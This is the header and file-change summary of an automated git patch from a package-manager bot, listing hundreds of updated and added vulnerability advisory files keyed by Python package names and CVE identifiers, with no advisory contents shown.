From 4d1bd2e9b5c75bed458786e5f01b97c9f7d97a2f Mon Sep 17 00:00:00 2001 From: BrewTestBot <1589480+BrewTestBot@users.noreply.github.com> Date: Thu, 10 Sep 2026 21:36:21 +0000 Subject: [PATCH] Matched advisory candidates (shard 36) Base: 577c983824b680a1491c3f6b64629943617b82e4 --- ...EW-aws-elasticbeanstalk-CVE-2008-0299.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2011-2185.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2013-1633.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2014-1829.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2014-1830.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2015-2296.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2016-9015.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2017-18342.json | 10 +- ...aws-elasticbeanstalk-CVE-2018-1000805.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2018-18074.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2018-20060.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2018-25091.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2018-7750.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2019-11236.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2019-11324.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2019-20477.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2020-14343.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2020-1747.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2020-26137.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2020-7212.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2021-28363.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2021-33503.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2022-24302.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2022-40897.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2023-32681.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2023-43804.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2023-45803.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2023-48795.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2024-35195.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2024-3651.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2024-37891.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2024-47081.json | 10 +- ...EW-aws-elasticbeanstalk-CVE-2024-6345.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2025-47273.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2025-50181.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2025-50182.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2025-66418.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2025-66471.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2025-69277.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2026-21441.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2026-25645.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2026-44405.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2026-44431.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2026-44432.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2026-45409.json | 10 +- ...W-aws-elasticbeanstalk-CVE-2026-59890.json | 10 +- .../BREW-bump-my-version-CVE-2015-8557.json | 16 +-- .../BREW-bump-my-version-CVE-2021-20270.json | 16 +-- .../BREW-bump-my-version-CVE-2021-27291.json | 16 +-- .../BREW-bump-my-version-CVE-2022-40896.json | 16 +-- .../BREW-bump-my-version-CVE-2023-26302.json | 10 +- .../BREW-bump-my-version-CVE-2023-26303.json | 10 +- .../BREW-bump-my-version-CVE-2024-3651.json | 16 +-- .../BREW-bump-my-version-CVE-2025-43859.json | 10 +- .../BREW-bump-my-version-CVE-2026-28684.json | 16 +-- .../BREW-bump-my-version-CVE-2026-4539.json | 16 +-- .../BREW-bump-my-version-CVE-2026-45409.json | 16 +-- .../BREW-bump-my-version-CVE-2026-58203.json | 8 +- .../BREW-bump-my-version-CVE-2026-7246.json | 8 +- .../BREW-bump-my-version-CVE-2026-84378.json | 93 ++++++++++++++++++ .../BREW-bump-my-version-CVE-2026-84379.json | 89 +++++++++++++++++ .../BREW-bump-my-version-CVE-2026-84380.json | 89 +++++++++++++++++ .../BREW-bump-my-version-CVE-2026-84381.json | 98 +++++++++++++++++++ .../BREW-bump-my-version-CVE-2026-84382.json | 89 +++++++++++++++++ advisories/BREW-credstash-CVE-2016-9015.json | 10 +- advisories/BREW-credstash-CVE-2018-20060.json | 10 +- advisories/BREW-credstash-CVE-2018-25091.json | 10 +- advisories/BREW-credstash-CVE-2019-11236.json | 10 +- advisories/BREW-credstash-CVE-2019-11324.json | 10 +- advisories/BREW-credstash-CVE-2020-26137.json | 10 +- advisories/BREW-credstash-CVE-2020-7212.json | 10 +- advisories/BREW-credstash-CVE-2021-28363.json | 10 +- advisories/BREW-credstash-CVE-2021-33503.json | 10 +- advisories/BREW-credstash-CVE-2023-43804.json | 10 +- advisories/BREW-credstash-CVE-2023-45803.json | 10 +- advisories/BREW-credstash-CVE-2024-37891.json | 10 +- advisories/BREW-credstash-CVE-2025-50181.json | 10 +- advisories/BREW-credstash-CVE-2025-50182.json | 10 +- advisories/BREW-credstash-CVE-2025-66418.json | 10 +- advisories/BREW-credstash-CVE-2025-66471.json | 10 +- advisories/BREW-credstash-CVE-2026-21441.json | 10 +- advisories/BREW-credstash-CVE-2026-44431.json | 10 +- advisories/BREW-credstash-CVE-2026-44432.json | 10 +- advisories/BREW-lue-reader-CVE-2014-3146.json | 10 +- advisories/BREW-lue-reader-CVE-2015-8557.json | 10 +- advisories/BREW-lue-reader-CVE-2016-5851.json | 10 +- .../BREW-lue-reader-CVE-2018-19787.json | 10 +- .../BREW-lue-reader-CVE-2020-27783.json | 10 +- .../BREW-lue-reader-CVE-2021-20270.json | 10 +- .../BREW-lue-reader-CVE-2021-21330.json | 10 +- .../BREW-lue-reader-CVE-2021-27291.json | 10 +- .../BREW-lue-reader-CVE-2021-28957.json | 10 +- .../BREW-lue-reader-CVE-2021-43818.json | 10 +- advisories/BREW-lue-reader-CVE-2022-2309.json | 10 +- .../BREW-lue-reader-CVE-2022-40896.json | 10 +- .../BREW-lue-reader-CVE-2023-26302.json | 10 +- .../BREW-lue-reader-CVE-2023-26303.json | 10 +- .../BREW-lue-reader-CVE-2023-37276.json | 10 +- .../BREW-lue-reader-CVE-2023-47627.json | 10 +- .../BREW-lue-reader-CVE-2023-47641.json | 10 +- .../BREW-lue-reader-CVE-2023-49081.json | 10 +- .../BREW-lue-reader-CVE-2023-49082.json | 10 +- .../BREW-lue-reader-CVE-2024-23334.json | 10 +- .../BREW-lue-reader-CVE-2024-23829.json | 10 +- .../BREW-lue-reader-CVE-2024-27306.json | 10 +- .../BREW-lue-reader-CVE-2024-30251.json | 10 +- advisories/BREW-lue-reader-CVE-2024-3651.json | 10 +- .../BREW-lue-reader-CVE-2024-42367.json | 10 +- .../BREW-lue-reader-CVE-2024-52303.json | 10 +- .../BREW-lue-reader-CVE-2024-52304.json | 10 +- .../BREW-lue-reader-CVE-2025-53643.json | 10 +- .../BREW-lue-reader-CVE-2025-69223.json | 10 +- .../BREW-lue-reader-CVE-2025-69224.json | 10 +- .../BREW-lue-reader-CVE-2025-69225.json | 10 +- .../BREW-lue-reader-CVE-2025-69226.json | 10 +- .../BREW-lue-reader-CVE-2025-69227.json | 10 +- .../BREW-lue-reader-CVE-2025-69228.json | 10 +- .../BREW-lue-reader-CVE-2025-69229.json | 10 +- .../BREW-lue-reader-CVE-2025-69230.json | 10 +- .../BREW-lue-reader-CVE-2025-69534.json | 10 +- .../BREW-lue-reader-CVE-2026-22815.json | 10 +- .../BREW-lue-reader-CVE-2026-34513.json | 10 +- .../BREW-lue-reader-CVE-2026-34514.json | 10 +- .../BREW-lue-reader-CVE-2026-34515.json | 10 +- .../BREW-lue-reader-CVE-2026-34516.json | 10 +- .../BREW-lue-reader-CVE-2026-34517.json | 10 +- .../BREW-lue-reader-CVE-2026-34518.json | 10 +- .../BREW-lue-reader-CVE-2026-34519.json | 10 +- .../BREW-lue-reader-CVE-2026-34520.json | 10 +- .../BREW-lue-reader-CVE-2026-34525.json | 10 +- .../BREW-lue-reader-CVE-2026-34993.json | 10 +- .../BREW-lue-reader-CVE-2026-41066.json | 10 +- advisories/BREW-lue-reader-CVE-2026-4539.json | 10 +- .../BREW-lue-reader-CVE-2026-45409.json | 10 +- .../BREW-lue-reader-CVE-2026-47265.json | 10 +- .../BREW-lue-reader-CVE-2026-50269.json | 10 +- .../BREW-lue-reader-CVE-2026-54273.json | 10 +- .../BREW-lue-reader-CVE-2026-54274.json | 10 +- .../BREW-lue-reader-CVE-2026-54275.json | 10 +- .../BREW-lue-reader-CVE-2026-54276.json | 10 +- .../BREW-lue-reader-CVE-2026-54277.json | 10 +- .../BREW-lue-reader-CVE-2026-54278.json | 10 +- .../BREW-lue-reader-CVE-2026-54279.json | 10 +- .../BREW-lue-reader-CVE-2026-54280.json | 10 +- .../BREW-lue-reader-CVE-2026-59881.json | 10 +- .../BREW-lue-reader-CVE-2026-69243.json | 10 +- .../BREW-lue-reader-CVE-2026-69244.json | 10 +- advisories/BREW-mcpm-CVE-2012-4571.json | 10 +- advisories/BREW-mcpm-CVE-2012-5577.json | 10 +- advisories/BREW-mcpm-CVE-2012-5578.json | 10 +- advisories/BREW-mcpm-CVE-2014-1829.json | 10 +- advisories/BREW-mcpm-CVE-2014-1830.json | 10 +- advisories/BREW-mcpm-CVE-2015-2296.json | 10 +- advisories/BREW-mcpm-CVE-2015-8557.json | 10 +- advisories/BREW-mcpm-CVE-2016-10516.json | 10 +- advisories/BREW-mcpm-CVE-2016-9015.json | 10 +- advisories/BREW-mcpm-CVE-2017-11424.json | 10 +- advisories/BREW-mcpm-CVE-2017-18342.json | 10 +- advisories/BREW-mcpm-CVE-2018-1000518.json | 10 +- advisories/BREW-mcpm-CVE-2018-18074.json | 10 +- advisories/BREW-mcpm-CVE-2018-20060.json | 10 +- advisories/BREW-mcpm-CVE-2018-25091.json | 10 +- advisories/BREW-mcpm-CVE-2019-11236.json | 10 +- advisories/BREW-mcpm-CVE-2019-11324.json | 10 +- advisories/BREW-mcpm-CVE-2019-14322.json | 10 +- advisories/BREW-mcpm-CVE-2019-14806.json | 10 +- advisories/BREW-mcpm-CVE-2019-18874.json | 10 +- advisories/BREW-mcpm-CVE-2019-20477.json | 10 +- advisories/BREW-mcpm-CVE-2020-14343.json | 10 +- advisories/BREW-mcpm-CVE-2020-1747.json | 10 +- advisories/BREW-mcpm-CVE-2020-26137.json | 10 +- advisories/BREW-mcpm-CVE-2020-28724.json | 10 +- advisories/BREW-mcpm-CVE-2020-7212.json | 10 +- advisories/BREW-mcpm-CVE-2020-7694.json | 10 +- advisories/BREW-mcpm-CVE-2020-7695.json | 10 +- advisories/BREW-mcpm-CVE-2021-20270.json | 10 +- advisories/BREW-mcpm-CVE-2021-27291.json | 10 +- advisories/BREW-mcpm-CVE-2021-28363.json | 10 +- advisories/BREW-mcpm-CVE-2021-33503.json | 10 +- advisories/BREW-mcpm-CVE-2021-33880.json | 10 +- advisories/BREW-mcpm-CVE-2021-41945.json | 10 +- advisories/BREW-mcpm-CVE-2022-0338.json | 10 +- advisories/BREW-mcpm-CVE-2022-29217.json | 10 +- advisories/BREW-mcpm-CVE-2022-40896.json | 10 +- advisories/BREW-mcpm-CVE-2023-23934.json | 10 +- advisories/BREW-mcpm-CVE-2023-25577.json | 10 +- advisories/BREW-mcpm-CVE-2023-26302.json | 10 +- advisories/BREW-mcpm-CVE-2023-26303.json | 10 +- advisories/BREW-mcpm-CVE-2023-29159.json | 10 +- advisories/BREW-mcpm-CVE-2023-29483.json | 10 +- advisories/BREW-mcpm-CVE-2023-30798.json | 10 +- advisories/BREW-mcpm-CVE-2023-32681.json | 10 +- advisories/BREW-mcpm-CVE-2023-43804.json | 10 +- advisories/BREW-mcpm-CVE-2023-45803.json | 10 +- advisories/BREW-mcpm-CVE-2023-46136.json | 10 +- advisories/BREW-mcpm-CVE-2024-24762.json | 10 +- advisories/BREW-mcpm-CVE-2024-34069.json | 10 +- advisories/BREW-mcpm-CVE-2024-35195.json | 10 +- advisories/BREW-mcpm-CVE-2024-3651.json | 10 +- advisories/BREW-mcpm-CVE-2024-37568.json | 10 +- advisories/BREW-mcpm-CVE-2024-37891.json | 10 +- advisories/BREW-mcpm-CVE-2024-41672.json | 10 +- advisories/BREW-mcpm-CVE-2024-47081.json | 10 +- advisories/BREW-mcpm-CVE-2024-47874.json | 10 +- advisories/BREW-mcpm-CVE-2024-49766.json | 10 +- advisories/BREW-mcpm-CVE-2024-49767.json | 10 +- advisories/BREW-mcpm-CVE-2024-53861.json | 10 +- advisories/BREW-mcpm-CVE-2024-53981.json | 10 +- advisories/BREW-mcpm-CVE-2025-43859.json | 10 +- advisories/BREW-mcpm-CVE-2025-50181.json | 10 +- advisories/BREW-mcpm-CVE-2025-50182.json | 10 +- advisories/BREW-mcpm-CVE-2025-53365.json | 10 +- advisories/BREW-mcpm-CVE-2025-53366.json | 10 +- advisories/BREW-mcpm-CVE-2025-54121.json | 10 +- advisories/BREW-mcpm-CVE-2025-59420.json | 10 +- advisories/BREW-mcpm-CVE-2025-61920.json | 10 +- advisories/BREW-mcpm-CVE-2025-62706.json | 10 +- advisories/BREW-mcpm-CVE-2025-62727.json | 10 +- advisories/BREW-mcpm-CVE-2025-62800.json | 10 +- advisories/BREW-mcpm-CVE-2025-62801.json | 10 +- advisories/BREW-mcpm-CVE-2025-64340.json | 10 +- advisories/BREW-mcpm-CVE-2025-65015.json | 10 +- advisories/BREW-mcpm-CVE-2025-66221.json | 10 +- advisories/BREW-mcpm-CVE-2025-66416.json | 10 +- advisories/BREW-mcpm-CVE-2025-66418.json | 10 +- advisories/BREW-mcpm-CVE-2025-66471.json | 10 +- advisories/BREW-mcpm-CVE-2025-68158.json | 10 +- advisories/BREW-mcpm-CVE-2025-69196.json | 10 +- advisories/BREW-mcpm-CVE-2025-69872.json | 10 +- advisories/BREW-mcpm-CVE-2025-71176.json | 10 +- advisories/BREW-mcpm-CVE-2026-21441.json | 10 +- advisories/BREW-mcpm-CVE-2026-21860.json | 10 +- advisories/BREW-mcpm-CVE-2026-23949.json | 10 +- advisories/BREW-mcpm-CVE-2026-24486.json | 10 +- advisories/BREW-mcpm-CVE-2026-25645.json | 10 +- advisories/BREW-mcpm-CVE-2026-27124.json | 10 +- advisories/BREW-mcpm-CVE-2026-27199.json | 10 +- advisories/BREW-mcpm-CVE-2026-27932.json | 10 +- advisories/BREW-mcpm-CVE-2026-27962.json | 10 +- advisories/BREW-mcpm-CVE-2026-28490.json | 10 +- advisories/BREW-mcpm-CVE-2026-28498.json | 10 +- advisories/BREW-mcpm-CVE-2026-28684.json | 10 +- advisories/BREW-mcpm-CVE-2026-28802.json | 10 +- advisories/BREW-mcpm-CVE-2026-32597.json | 10 +- advisories/BREW-mcpm-CVE-2026-32871.json | 10 +- advisories/BREW-mcpm-CVE-2026-40347.json | 10 +- advisories/BREW-mcpm-CVE-2026-41425.json | 10 +- advisories/BREW-mcpm-CVE-2026-41479.json | 10 +- advisories/BREW-mcpm-CVE-2026-42561.json | 10 +- advisories/BREW-mcpm-CVE-2026-44431.json | 10 +- advisories/BREW-mcpm-CVE-2026-44432.json | 10 +- advisories/BREW-mcpm-CVE-2026-44681.json | 10 +- advisories/BREW-mcpm-CVE-2026-4539.json | 10 +- advisories/BREW-mcpm-CVE-2026-45409.json | 10 +- advisories/BREW-mcpm-CVE-2026-48522.json | 10 +- advisories/BREW-mcpm-CVE-2026-48523.json | 10 +- advisories/BREW-mcpm-CVE-2026-48524.json | 10 +- advisories/BREW-mcpm-CVE-2026-48525.json | 10 +- advisories/BREW-mcpm-CVE-2026-48526.json | 10 +- advisories/BREW-mcpm-CVE-2026-48710.json | 10 +- advisories/BREW-mcpm-CVE-2026-48817.json | 10 +- advisories/BREW-mcpm-CVE-2026-48818.json | 10 +- advisories/BREW-mcpm-CVE-2026-48990.json | 10 +- advisories/BREW-mcpm-CVE-2026-49852.json | 10 +- advisories/BREW-mcpm-CVE-2026-52869.json | 10 +- advisories/BREW-mcpm-CVE-2026-52870.json | 10 +- advisories/BREW-mcpm-CVE-2026-53537.json | 10 +- advisories/BREW-mcpm-CVE-2026-53538.json | 10 +- advisories/BREW-mcpm-CVE-2026-53539.json | 10 +- advisories/BREW-mcpm-CVE-2026-53540.json | 10 +- advisories/BREW-mcpm-CVE-2026-54282.json | 10 +- advisories/BREW-mcpm-CVE-2026-54283.json | 10 +- advisories/BREW-mcpm-CVE-2026-59950.json | 10 +- advisories/BREW-osc-cli-CVE-2013-1633.json | 10 +- advisories/BREW-osc-cli-CVE-2014-1829.json | 10 +- advisories/BREW-osc-cli-CVE-2014-1830.json | 10 +- advisories/BREW-osc-cli-CVE-2015-2296.json | 10 +- advisories/BREW-osc-cli-CVE-2016-9015.json | 10 +- advisories/BREW-osc-cli-CVE-2018-18074.json | 10 +- advisories/BREW-osc-cli-CVE-2018-20060.json | 10 +- advisories/BREW-osc-cli-CVE-2018-25091.json | 10 +- advisories/BREW-osc-cli-CVE-2019-11236.json | 10 +- advisories/BREW-osc-cli-CVE-2019-11324.json | 10 +- advisories/BREW-osc-cli-CVE-2020-26137.json | 10 +- advisories/BREW-osc-cli-CVE-2020-7212.json | 10 +- advisories/BREW-osc-cli-CVE-2021-28363.json | 10 +- advisories/BREW-osc-cli-CVE-2021-33503.json | 10 +- advisories/BREW-osc-cli-CVE-2022-40897.json | 10 +- advisories/BREW-osc-cli-CVE-2023-32681.json | 10 +- advisories/BREW-osc-cli-CVE-2023-43804.json | 10 +- advisories/BREW-osc-cli-CVE-2023-45803.json | 10 +- advisories/BREW-osc-cli-CVE-2024-35195.json | 10 +- advisories/BREW-osc-cli-CVE-2024-3651.json | 10 +- advisories/BREW-osc-cli-CVE-2024-37891.json | 10 +- advisories/BREW-osc-cli-CVE-2024-47081.json | 10 +- advisories/BREW-osc-cli-CVE-2024-6345.json | 10 +- advisories/BREW-osc-cli-CVE-2025-47273.json | 10 +- advisories/BREW-osc-cli-CVE-2025-50181.json | 10 +- advisories/BREW-osc-cli-CVE-2025-50182.json | 10 +- advisories/BREW-osc-cli-CVE-2025-66418.json | 10 +- advisories/BREW-osc-cli-CVE-2025-66471.json | 10 +- advisories/BREW-osc-cli-CVE-2026-21441.json | 10 +- advisories/BREW-osc-cli-CVE-2026-25645.json | 10 +- advisories/BREW-osc-cli-CVE-2026-44431.json | 10 +- advisories/BREW-osc-cli-CVE-2026-44432.json | 10 +- advisories/BREW-osc-cli-CVE-2026-45409.json | 10 +- advisories/BREW-osc-cli-CVE-2026-59890.json | 10 +- advisories/BREW-pillow-CVE-2014-1932.json | 9 +- advisories/BREW-pillow-CVE-2014-1933.json | 9 +- advisories/BREW-pillow-CVE-2014-3007.json | 9 +- advisories/BREW-pillow-CVE-2014-3589.json | 9 +- advisories/BREW-pillow-CVE-2014-3598.json | 9 +- advisories/BREW-pillow-CVE-2014-9601.json | 9 +- advisories/BREW-pillow-CVE-2016-0740.json | 9 +- advisories/BREW-pillow-CVE-2016-0775.json | 9 +- advisories/BREW-pillow-CVE-2016-2533.json | 9 +- advisories/BREW-pillow-CVE-2016-3076.json | 9 +- advisories/BREW-pillow-CVE-2016-4009.json | 9 +- advisories/BREW-pillow-CVE-2016-9189.json | 9 +- advisories/BREW-pillow-CVE-2016-9190.json | 9 +- advisories/BREW-pillow-CVE-2019-16865.json | 9 +- advisories/BREW-pillow-CVE-2019-19911.json | 9 +- advisories/BREW-pillow-CVE-2020-10177.json | 9 +- advisories/BREW-pillow-CVE-2020-10378.json | 9 +- advisories/BREW-pillow-CVE-2020-10379.json | 9 +- advisories/BREW-pillow-CVE-2020-10994.json | 9 +- advisories/BREW-pillow-CVE-2020-11538.json | 9 +- advisories/BREW-pillow-CVE-2020-35653.json | 9 +- advisories/BREW-pillow-CVE-2020-35654.json | 9 +- advisories/BREW-pillow-CVE-2020-35655.json | 9 +- advisories/BREW-pillow-CVE-2020-5310.json | 9 +- advisories/BREW-pillow-CVE-2020-5311.json | 9 +- advisories/BREW-pillow-CVE-2020-5312.json | 9 +- advisories/BREW-pillow-CVE-2020-5313.json | 9 +- advisories/BREW-pillow-CVE-2021-23437.json | 9 +- advisories/BREW-pillow-CVE-2021-25287.json | 9 +- advisories/BREW-pillow-CVE-2021-25288.json | 9 +- advisories/BREW-pillow-CVE-2021-25289.json | 9 +- advisories/BREW-pillow-CVE-2021-25290.json | 9 +- advisories/BREW-pillow-CVE-2021-25291.json | 9 +- advisories/BREW-pillow-CVE-2021-25292.json | 9 +- advisories/BREW-pillow-CVE-2021-25293.json | 9 +- advisories/BREW-pillow-CVE-2021-27921.json | 9 +- advisories/BREW-pillow-CVE-2021-27922.json | 9 +- advisories/BREW-pillow-CVE-2021-27923.json | 9 +- advisories/BREW-pillow-CVE-2021-28675.json | 9 +- advisories/BREW-pillow-CVE-2021-28676.json | 9 +- advisories/BREW-pillow-CVE-2021-28677.json | 9 +- advisories/BREW-pillow-CVE-2021-28678.json | 9 +- advisories/BREW-pillow-CVE-2021-34552.json | 9 +- advisories/BREW-pillow-CVE-2022-22815.json | 9 +- advisories/BREW-pillow-CVE-2022-22816.json | 9 +- advisories/BREW-pillow-CVE-2022-22817.json | 9 +- advisories/BREW-pillow-CVE-2022-24303.json | 9 +- advisories/BREW-pillow-CVE-2022-30595.json | 9 +- advisories/BREW-pillow-CVE-2022-45198.json | 9 +- advisories/BREW-pillow-CVE-2022-45199.json | 9 +- advisories/BREW-pillow-CVE-2023-44271.json | 9 +- advisories/BREW-pillow-CVE-2023-4863.json | 9 +- advisories/BREW-pillow-CVE-2023-50447.json | 9 +- advisories/BREW-pillow-CVE-2024-28219.json | 9 +- advisories/BREW-pillow-CVE-2025-48379.json | 16 +-- advisories/BREW-pillow-CVE-2026-25990.json | 9 +- advisories/BREW-pillow-CVE-2026-40192.json | 13 +-- advisories/BREW-pillow-CVE-2026-42308.json | 9 +- advisories/BREW-pillow-CVE-2026-42309.json | 9 +- advisories/BREW-pillow-CVE-2026-42310.json | 9 +- advisories/BREW-pillow-CVE-2026-42311.json | 9 +- advisories/BREW-pillow-CVE-2026-54058.json | 9 +- advisories/BREW-pillow-CVE-2026-54059.json | 9 +- advisories/BREW-pillow-CVE-2026-54060.json | 9 +- advisories/BREW-pillow-CVE-2026-55379.json | 9 +- advisories/BREW-pillow-CVE-2026-55380.json | 9 +- advisories/BREW-pillow-CVE-2026-55798.json | 9 +- advisories/BREW-pillow-CVE-2026-59197.json | 9 +- advisories/BREW-pillow-CVE-2026-59198.json | 9 +- advisories/BREW-pillow-CVE-2026-59199.json | 9 +- advisories/BREW-pillow-CVE-2026-59200.json | 9 +- advisories/BREW-pillow-CVE-2026-59203.json | 9 +- advisories/BREW-pillow-CVE-2026-59204.json | 9 +- advisories/BREW-pillow-CVE-2026-59205.json | 9 +- advisories/BREW-snapcraft-CVE-2009-5042.json | 10 +- advisories/BREW-snapcraft-CVE-2012-4571.json | 10 +- advisories/BREW-snapcraft-CVE-2012-5577.json | 10 +- advisories/BREW-snapcraft-CVE-2012-5578.json | 10 +- advisories/BREW-snapcraft-CVE-2013-1633.json | 10 +- advisories/BREW-snapcraft-CVE-2013-2037.json | 10 +- advisories/BREW-snapcraft-CVE-2014-0012.json | 10 +- advisories/BREW-snapcraft-CVE-2014-1402.json | 10 +- advisories/BREW-snapcraft-CVE-2014-1624.json | 10 +- advisories/BREW-snapcraft-CVE-2014-1829.json | 10 +- advisories/BREW-snapcraft-CVE-2014-1830.json | 10 +- advisories/BREW-snapcraft-CVE-2014-3146.json | 10 +- advisories/BREW-snapcraft-CVE-2015-2296.json | 10 +- advisories/BREW-snapcraft-CVE-2015-5237.json | 10 +- advisories/BREW-snapcraft-CVE-2016-10745.json | 10 +- advisories/BREW-snapcraft-CVE-2016-9015.json | 10 +- advisories/BREW-snapcraft-CVE-2017-18342.json | 10 +- advisories/BREW-snapcraft-CVE-2018-18074.json | 10 +- advisories/BREW-snapcraft-CVE-2018-19787.json | 10 +- advisories/BREW-snapcraft-CVE-2018-20060.json | 10 +- advisories/BREW-snapcraft-CVE-2018-25091.json | 10 +- advisories/BREW-snapcraft-CVE-2019-10906.json | 10 +- advisories/BREW-snapcraft-CVE-2019-11236.json | 10 +- advisories/BREW-snapcraft-CVE-2019-11324.json | 10 +- advisories/BREW-snapcraft-CVE-2019-12761.json | 10 +- advisories/BREW-snapcraft-CVE-2019-19588.json | 10 +- advisories/BREW-snapcraft-CVE-2019-20477.json | 10 +- advisories/BREW-snapcraft-CVE-2020-11078.json | 10 +- advisories/BREW-snapcraft-CVE-2020-14343.json | 10 +- advisories/BREW-snapcraft-CVE-2020-1747.json | 10 +- advisories/BREW-snapcraft-CVE-2020-26137.json | 10 +- advisories/BREW-snapcraft-CVE-2020-27783.json | 10 +- advisories/BREW-snapcraft-CVE-2020-28493.json | 10 +- advisories/BREW-snapcraft-CVE-2020-7212.json | 10 +- advisories/BREW-snapcraft-CVE-2021-21240.json | 10 +- advisories/BREW-snapcraft-CVE-2021-28363.json | 10 +- advisories/BREW-snapcraft-CVE-2021-28957.json | 10 +- advisories/BREW-snapcraft-CVE-2021-33503.json | 10 +- advisories/BREW-snapcraft-CVE-2021-41945.json | 10 +- advisories/BREW-snapcraft-CVE-2021-43818.json | 10 +- advisories/BREW-snapcraft-CVE-2022-1941.json | 10 +- advisories/BREW-snapcraft-CVE-2022-2309.json | 10 +- advisories/BREW-snapcraft-CVE-2022-36087.json | 10 +- advisories/BREW-snapcraft-CVE-2022-40897.json | 10 +- advisories/BREW-snapcraft-CVE-2023-32681.json | 10 +- advisories/BREW-snapcraft-CVE-2023-43804.json | 10 +- advisories/BREW-snapcraft-CVE-2023-45803.json | 10 +- advisories/BREW-snapcraft-CVE-2024-22195.json | 10 +- advisories/BREW-snapcraft-CVE-2024-34064.json | 10 +- advisories/BREW-snapcraft-CVE-2024-35195.json | 10 +- advisories/BREW-snapcraft-CVE-2024-3651.json | 10 +- advisories/BREW-snapcraft-CVE-2024-37891.json | 10 +- advisories/BREW-snapcraft-CVE-2024-47081.json | 10 +- advisories/BREW-snapcraft-CVE-2024-56201.json | 10 +- advisories/BREW-snapcraft-CVE-2024-56326.json | 10 +- advisories/BREW-snapcraft-CVE-2024-6345.json | 10 +- advisories/BREW-snapcraft-CVE-2025-27516.json | 10 +- advisories/BREW-snapcraft-CVE-2025-43859.json | 10 +- advisories/BREW-snapcraft-CVE-2025-4565.json | 10 +- advisories/BREW-snapcraft-CVE-2025-47273.json | 10 +- advisories/BREW-snapcraft-CVE-2025-50181.json | 10 +- advisories/BREW-snapcraft-CVE-2025-50182.json | 10 +- advisories/BREW-snapcraft-CVE-2025-66418.json | 10 +- advisories/BREW-snapcraft-CVE-2025-66471.json | 10 +- advisories/BREW-snapcraft-CVE-2025-69277.json | 10 +- advisories/BREW-snapcraft-CVE-2026-0994.json | 10 +- advisories/BREW-snapcraft-CVE-2026-21441.json | 10 +- advisories/BREW-snapcraft-CVE-2026-23949.json | 10 +- advisories/BREW-snapcraft-CVE-2026-25645.json | 10 +- advisories/BREW-snapcraft-CVE-2026-41066.json | 10 +- advisories/BREW-snapcraft-CVE-2026-44431.json | 10 +- advisories/BREW-snapcraft-CVE-2026-44432.json | 10 +- advisories/BREW-snapcraft-CVE-2026-45409.json | 10 +- advisories/BREW-snapcraft-CVE-2026-59890.json | 10 +- advisories/BREW-snapcraft-CVE-2026-59939.json | 10 +- advisories/BREW-tartufo-CVE-2022-24439.json | 10 +- advisories/BREW-tartufo-CVE-2023-40267.json | 10 +- advisories/BREW-tartufo-CVE-2023-40590.json | 10 +- advisories/BREW-tartufo-CVE-2023-41040.json | 10 +- advisories/BREW-tartufo-CVE-2024-22190.json | 10 +- advisories/BREW-tartufo-CVE-2026-42215.json | 10 +- advisories/BREW-tartufo-CVE-2026-42284.json | 10 +- advisories/BREW-tartufo-CVE-2026-44243.json | 10 +- advisories/BREW-tartufo-CVE-2026-44244.json | 10 +- advisories/BREW-tartufo-CVE-2026-67322.json | 13 ++- advisories/BREW-tartufo-CVE-2026-67323.json | 15 ++- advisories/BREW-tartufo-CVE-2026-67324.json | 5 +- advisories/BREW-tartufo-CVE-2026-67325.json | 15 ++- advisories/BREW-tartufo-CVE-2026-73619.json | 5 +- advisories/BREW-tartufo-CVE-2026-73620.json | 5 +- advisories/BREW-tartufo-CVE-2026-73621.json | 5 +- advisories/BREW-tartufo-CVE-2026-73622.json | 5 +- advisories/BREW-tartufo-CVE-2026-73623.json | 5 +- advisories/BREW-tartufo-CVE-2026-73625.json | 5 +- advisories/BREW-tartufo-CVE-2026-76217.json | 13 ++- advisories/BREW-tartufo-CVE-2026-76218.json | 13 ++- advisories/BREW-tartufo-CVE-2026-76219.json | 15 ++- advisories/BREW-tartufo-CVE-2026-76220.json | 13 ++- advisories/BREW-tartufo-CVE-2026-76221.json | 10 +- advisories/BREW-tartufo-CVE-2026-76222.json | 22 +++-- advisories/BREW-tartufo-CVE-2026-78675.json | 41 ++++++-- advisories/BREW-tartufo-CVE-2026-78676.json | 29 ++++-- advisories/BREW-tartufo-CVE-2026-78677.json | 41 ++++++-- advisories/BREW-tartufo-CVE-2026-78678.json | 27 +++-- advisories/BREW-tartufo-CVE-2026-78679.json | 93 ++++++++++++++++++ 